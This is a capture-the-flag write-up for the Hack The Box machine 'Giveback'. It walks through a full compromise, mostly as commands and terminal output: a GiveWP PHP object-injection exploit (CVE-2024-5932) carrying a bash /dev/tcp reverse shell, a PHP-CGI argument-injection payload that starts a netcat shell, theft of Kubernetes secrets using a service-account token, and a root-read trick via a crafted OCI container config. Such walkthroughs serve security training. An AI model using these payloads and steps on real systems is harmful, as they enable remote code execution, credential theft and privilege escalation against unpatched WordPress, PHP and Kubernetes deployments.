Hack The Box: Giveback
Hack The Box: Giveback
GiveBack is a medium-difficulty Linux machine from Hack The Box where we exploited an unauthenticated PHP object injection in the GiveWP plugin (CVE-2024-5932) to achieve remote code execution inside a Kubernetes pod running WordPress → used the initial reverse shell to abuse a legacy PHP-CGI endpoint with allow_url_include + auto_prepend_file to escape the pod and reach another container → enumerated Kubernetes API secrets via the service account token to recover MASTERPASS password for user babywyrm → discovered sudo privileges to run /opt/debug → create a malicious OCI container configuration that bind-mounted /root and executed cat /root/root.txt inside a new namespace to read the root flag directly.
Enumeration
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(sanke㉿vbox)-[~/Downloads/giveback]
└─$ sudo nmap -A -v 10.10.11.94
[sudo] password for sanke:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-02 10:08 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_ 256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open http nginx 1.28.0
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-title: 503 Service Temporarily Unavailable
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Uptime guess: 37.848 days (since Thu Sep 25 14:48:12 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation
https://github.com/EQSTLab/CVE-2024-5932
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(venv)─(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need -c "bash -c 'bash -i >& /dev/tcp/10.10.15.124/4444 0>&1'"
..-+*******-
.=#+-------=@. .:==:.
.**-------=*+: .-=++.-+=:.
+*-------=#=+++++++++=:.. -+:==**=+-+:.
.%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=..
:%--**+-::::::::::::::::::::+*=: .::*=**=:.
..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:.
..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-.
.-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:..
..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=.
.=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%-
.*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%-
.+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%-
.+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%-
.=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#-
.=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#-
.-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*:
:+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*.
.-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+.
.::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-.
%+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%.
*+.......+*::::::::::::::::-****-:::::=*=:.++:*=
.%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#.
++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=.
:#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-..
.++....-#:::%. .-*+-..*=.+@= .=+..-#
.:+++#@#-:-#= ... .-++:-%@@= .:#
:+++**##@#+=. -%@@@%- .-=*#.
.=+::+::-@: #@@@@+. :+*=::=*-
.=+:-**+%%+=-:.. =*#*-..=*-:::::=*
:++---::--=*#+*+++++**+*+**-::::::+=
.+*=:::---+*:::::++++++*+=:::::-*=.
.:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team)
..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2024-5932
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================
CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion
=============================================================================================================
[\] Exploit loading, please wait...
[+] Requested Data:
{'give-form-id': '17', 'give-form-hash': '1a76ef6e19', 'give-price-id': '0', 'give-amount': '$10.00', 'give_first': 'Christopher', 'give_last': 'Keller', 'give_email': 'amanda34@example.com', 'give_title': 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:52:"bash -c \'bash -i >& /dev/tcp/10.10.15.124/4444 0>&1\'";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}', 'give-gateway': 'offline', 'action': 'give_process_donation'}
in other terminal you will get shell
1
2
3
4
5
6
7
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-8353]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.124] from (UNKNOWN) [10.10.11.94] 33721
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<s-967b59c58-z4r9g:/opt/bitnami/wordpress/wp-admin$
So this is a container here and we are seeing wordpress here. Run this in the WordPress shell
1
php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="nc <IP> 4455 -e /bin/sh"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);'
Listen on your machine
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.16.223] from (UNKNOWN) [10.10.11.94] 25702
pwd
/var/www/html/cgi-bin
env
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.43.0.1:443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-b4z8d
PHP_INI_DIR=/usr/local/etc/php
BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80
BETA_VINO_WP_WORDPRESS_SERVICE_PORT=80
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
WP_NGINX_SERVICE_SERVICE_PORT=80
WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80
SHLVL=4
PHP_CGI_VERSION=8.3.3
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
HOME=/root
PHP_LDFLAGS=-Wl,-O1 -pie
LEGACY_CGI_ENABLED=true
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204
BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242
PHP_VERSION=8.3.3
LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
LEGACY_MODE=enabled
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PORT=3306
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PORT=80
GPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 AFD8691FDAEDF03BDF6E460563F15A9B715376CA
BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
WP_NGINX_SERVICE_PORT_80_TCP_PORT=80
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PROTO=tcp
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_ASC_URL=https://www.php.net/distributions/php-8.3.3.tar.xz.asc
BETA_VINO_WP_MARIADB_SERVICE_PORT_MYSQL=3306
WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
PHP_URL=https://www.php.net/distributions/php-8.3.3.tar.xz
PHP_MAX_EXECUTION_TIME=120
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
BETA_VINO_WP_MARIADB_SERVICE_PORT=3306
BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204
KUBERNETES_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306
PHP_MEMORY_LIMIT=128M
KUBERNETES_PORT_443_TCP_PROTO=tcp
WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
CMS_ENVIRONMENT=development
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT_HTTPS=443
PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/www/html/cgi-bin
PHP_SHA256=b0a996276fe21fe9ca8f993314c8bc02750f464c7b0343f056fb0894a8dfa9d1
BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
There is KUBERNETES here so let’s from the compromised pod (or via that shell) enumerate k8s secrets
1
2
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets
You will be having many data encoded but what we need here is the MASTERPASS password that is encoded in base64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
"type": "helm.sh/release.v1"
},
{
"metadata": {
"name": "user-secret-babywyrm",
"namespace": "default",
"uid": "946de928-3137-405d-be06-fdf7777418f4",
"resourceVersion": "2855783",
"creationTimestamp": "2025-11-08T13:35:05Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-babywyrm",
"uid": "996226d2-c924-48e5-b85a-9da1981dc880",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:05Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:MASTERPASS": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"996226d2-c924-48e5-b85a-9da1981dc880\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"MASTERPASS": "aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng="
},
"type": "Opaque"
},
{
"metadata": {
"name": "user-secret-margotrobbie",
"namespace": "default",
"uid": "5eadfcb6-a3c9-4805-8d92-9e099baef169",
"resourceVersion": "2855851",
"creationTimestamp": "2025-11-08T13:35:13Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-margotrobbie",
"uid": "2e420823-32ae-4b94-882c-bccb5f3b285f",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:13Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:USER_PASSWORD": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"2e420823-32ae-4b94-882c-bccb5f3b285f\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"USER_PASSWORD": "dk00NVhDc2NtQ20wYkVzcTZ2cjBsQzVvY091eWUxWQ=="
},
"type": "Opaque"
},
{
"metadata": {
"name": "user-secret-sydneysweeney",
"namespace": "default",
"uid": "719d1d52-84a3-46d8-81c7-3350d6777939",
"resourceVersion": "2855829",
"creationTimestamp": "2025-11-08T13:35:10Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-sydneysweeney",
"uid": "f1c788cb-2349-4cea-827a-8f6ec9566fb3",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:10Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:USER_PASSWORD": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"f1c788cb-2349-4cea-827a-8f6ec9566fb3\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"USER_PASSWORD": "ZnlQZk1HYktXcTJtc05Xam11N1p4T3F3MWNoSmxzZVg="
},
"type": "Opaque"
}
]
}
Here is the base64 password
“MASTERPASS”: “aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng=”
let’s decode it now using a simple linux command.
1
2
3
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ echo "aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng=" | base64 -d
jWPweBCc2qLFs5cs3lF1w0DZnvFDYp6x
Let’s gooo!! We have our password . Let’s get the user flag now!
BTW the PASSWORD is always changing so it’s not the same.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ ssh babywyrm@giveback.htb
babywyrm@giveback.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sat Nov 8 13:54:10 2025 from 10.10.16.223
babywyrm@giveback:~$ cat user.txt
<USER_FLAG>
Privilege Escalation
Our famous command in this phase which we always need to check is “sudo -l” and i guess we have something interesting here.
1
2
3
4
5
6
7
8
babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
User babywyrm may run the following commands on localhost:
(ALL) NOPASSWD: !ALL
(ALL) /opt/debug
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
babywyrm@giveback:~$ mkdir -p ~/readflag
babywyrm@giveback:~$ cd ~/readflag
# Create the rootfs directory that runc expects
babywyrm@giveback:~$ mkdir rootfs
# Now we create the config file
cat > config.json << 'EOF'
{
"ociVersion": "1.0.2",
"process": {
"user": {"uid": 0, "gid": 0},
"args": ["/bin/cat", "/root/root.txt"],
"cwd": "/",
"env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
"terminal": false
},
"root": {"path": "rootfs"},
"mounts": [
{"destination": "/proc", "type": "proc", "source": "proc"},
{"destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": ["nosuid","strictatime","mode=755","size=65536k"]},
{"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
{"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
{"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
{"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
{"destination": "/usr", "type": "bind", "source": "/usr", "options": ["bind","ro"]}
],
"linux": {
"namespaces": [
{"type": "pid"},
{"type": "network"},
{"type": "ipc"},
{"type": "uts"},
{"type": "mount"}
]
}
}
EOF
babywyrm@giveback:~$ sudo /opt/debug run rootfs
enter babywyrm pass : <REDACTED>
Please enter the administrative password : <REDACTED>
Both passwords verified. Executing the command ...
<ROOT_FLAG>
PWNEED!!!!
This post is licensed under CC BY 4.0 by the author.